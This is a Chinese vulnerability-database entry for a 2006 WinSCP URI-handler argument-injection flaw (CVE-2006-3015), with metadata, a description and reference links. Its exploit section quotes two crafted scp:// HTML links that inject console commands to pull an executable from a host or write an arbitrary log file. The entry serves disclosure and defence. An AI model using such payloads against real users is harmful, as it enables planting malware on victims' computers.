WinSCP 多个自变量注入漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1110442 漏洞类型 代码注入
发布时间 2006-06-12 更新时间 2007-09-27
CVE编号 CVE-2006-3015 CNNVD-ID CNNVD-200606-297
漏洞平台 Windows CVSS评分 7.1
|漏洞来源
https://www.exploit-db.com/exploits/28007
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200606-297
|漏洞详情
WinSCP存在自变量注入漏洞,远程攻击者可通过在scp或sftpURI中的编码空格和双引号字符来上载或下载任意文件。
|漏洞EXP
source: http://www.securityfocus.com/bid/18384/info

WinSCP is prone to an arbitrary file-access vulnerability. 

An attacker can exploit this issue to upload arbitrary files to a victim user's computer or to download arbitrary files from the victim's computer in the context of the vulnerable application.

This issue affects version 3.8.1; earlier versions may also be vulnerable.

<a href="scp://user:password@www.example.com:22/%22%20/console%20/command%20%22lcd%20c:\%22%20%22get%201.exe%22%20exit">download malware.exe</a>
<a href="scp://jelmer@www.example.com:22/%22%20%22/log=c:%5csomefile%22"log</a>
|参考资料

来源:US-CERT
名称:VU#912588
链接:http://www.kb.cert.org/vuls/id/912588
来源:XF
名称:winscp-uri-handler-command-execution(27075)
链接:http://xforce.iss.net/xforce/xfdb/27075
来源:BID
名称:18384
链接:http://www.securityfocus.com/bid/18384
来源:VUPEN
名称:ADV-2006-2289
链接:http://www.frsirt.com/english/advisories/2006/2289
来源:winscp.net
链接:http://winscp.net/eng/docs/history#3.8.2
来源:SECUNIA
名称:20575
链接:http://secunia.com/advisories/20575
来源:FULLDISC
名称:20060611WinSCP-URIHandlerCommandSwitchParsing
链接:http://lists.grok.org.uk/pipermail/full-disclosure/2006-June/046810.html
来源:FULLDISC
名称:20060310WinSCP-URIHandlerCommandSwitchParsing
链接:http://archives.neohapsis.com/archives/fulldisclosure/2006-06/0196.html